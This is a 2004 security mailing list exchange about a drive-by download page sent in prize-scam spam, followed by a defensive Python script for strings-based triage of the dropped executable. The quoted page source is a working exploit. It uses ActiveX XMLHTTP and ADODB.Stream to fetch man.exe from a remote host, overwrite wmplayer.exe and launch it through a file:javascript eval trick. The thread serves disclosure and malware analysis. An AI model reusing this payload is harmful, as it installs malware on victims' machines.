If you look at the symbols from that exe, they look dodgy: RegQueryValueExA, ShellExecuteA, 4FtpPutFileA.
It also appears to have a base64 payload inside it, and I only used strings for that; it's too hot to do any real work.

----- Original Message -----
From: "axid3j1al axid3j1al" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, February 03, 2004 4:40 PM
Subject: [Full-Disclosure] Old Hack?

> Has anyone seen this little code injection hack?
>
> Is this old?
>
> Email has subject line "congranulations! you won $1169"
> with body
> http://sinaraevent.com/bbs/zipcode/6.htm
>
> and code
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://sinaraevent.com/bbs/zipcode/man.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
> result = '';
> lines = code.split(/\r\n/);
> for (i=0;i<lines.length;i++) {
>
> line = lines[i];
> line = line.replace(/^\s+/,"");
> line = line.replace(/\s+$/,"");
> line = line.replace(/'/g,"\\'");
> line = line.replace(/[\\]/g,"\\\\");
> line = line.replace(/[/]/g,"%2f");
>
> if (line != '') {
> result += line +'\\r\\n';
> }
> }
> return result;
> }
>
> function doit() {
> mycode = preparecode(document.all.code.value);
> myURL = "file:javascript:eval('" + mycode + "')";
> window.open(myURL,"_media")
> }
>
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
>
> </script>
>
> braindwish has expired
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
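The reply above does a quick triage of the dropped executable with nothing more than strings: it spots Win32 imports that hint at what the binary does (RegQueryValueExA, ShellExecuteA, FtpPutFileA) and a base64 blob embedded in the file. The script below is an added example written for this page, not code from either poster, that automates exactly that first pass: it pulls printable ASCII runs out of a byte blob the way strings does, matches them against the import names the reply called out (allowing for the stray leading byte strings output often carries, as in "4FtpPutFileA"), and looks for base64 runs that decode to readable text. The SAMPLE bytes are constructed here to stand in for the real exe; the three API names are real Win32 functions, but the list and the "why it matters" notes are the example's own assumptions, and hits from it are leads for a deeper look, not a verdict, since plenty of legitimate software imports the same functions.

```python
import re
import base64
import binascii

# Imports the reply flagged from strings output. Assumption for this example:
# the explanations are a triage aid, not a malware signature.
SUSPICIOUS_IMPORTS = {
    "RegQueryValueExA": "reads registry values (configuration / install discovery)",
    "ShellExecuteA": "launches other programs or opens URLs",
    "FtpPutFileA": "uploads files to an FTP server (possible exfiltration)",
}

# Runs of printable ASCII, the same thing `strings` prints.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Long runs drawn from the base64 alphabet, optionally padded.
BASE64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")


def extract_strings(data, min_len=4):
    """Equivalent of `strings -n <min_len>` on an in-memory blob."""
    return [m.group().decode("ascii")
            for m in STRING_RE.finditer(data)
            if len(m.group()) >= min_len]


def find_suspicious_imports(strings):
    """Map each flagged API name found in the strings to its triage note.

    endswith() tolerates the stray byte that often precedes an import name
    in raw strings output (e.g. "4FtpPutFileA" in the reply).
    """
    hits = {}
    for s in strings:
        for name, why in SUSPICIOUS_IMPORTS.items():
            if s.endswith(name):
                hits[name] = why
    return hits


def _mostly_printable(blob, threshold=0.9):
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob)
    return printable / len(blob) >= threshold


def find_base64_blobs(data):
    """Return (encoded, decoded) pairs for base64 runs that decode to text."""
    blobs = []
    for m in BASE64_RE.finditer(data):
        candidate = m.group()
        # Restore missing '=' padding so unpadded runs still decode.
        padded = candidate + b"=" * (-len(candidate) % 4)
        try:
            decoded = base64.b64decode(padded, validate=True)
        except (binascii.Error, ValueError):
            continue
        if decoded and _mostly_printable(decoded):
            blobs.append((candidate.decode("ascii"), decoded))
    return blobs


def triage(data):
    """One-shot summary of what a strings-only look at the file reveals."""
    strings = extract_strings(data)
    return {
        "strings": strings,
        "imports": find_suspicious_imports(strings),
        "base64": find_base64_blobs(data),
    }


# Constructed stand-in for the exe: a fake PE header, an import table fragment
# with the names from the reply, and a base64-encoded string of the kind a
# dropper might carry. Not real malware bytes.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"KERNEL32.dll\x00"
    + b"RegQueryValueExA\x00ShellExecuteA\x00"
    + b"4FtpPutFileA\x00"
    + base64.b64encode(b"ftp.example.invalid user pass") + b"\x00"
    + b"\x00" * 4
)

if __name__ == "__main__":
    report = triage(SAMPLE)
    for name, why in report["imports"].items():
        print(f"import {name}: {why}")
    for encoded, decoded in report["base64"]:
        print(f"base64 {encoded} -> {decoded!r}")
```

Run it against a real file with triage(open(path, "rb").read()); anything it flags is only a reason to put the sample in a sandbox or disassembler, which is the "real work" the reply says it skipped.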
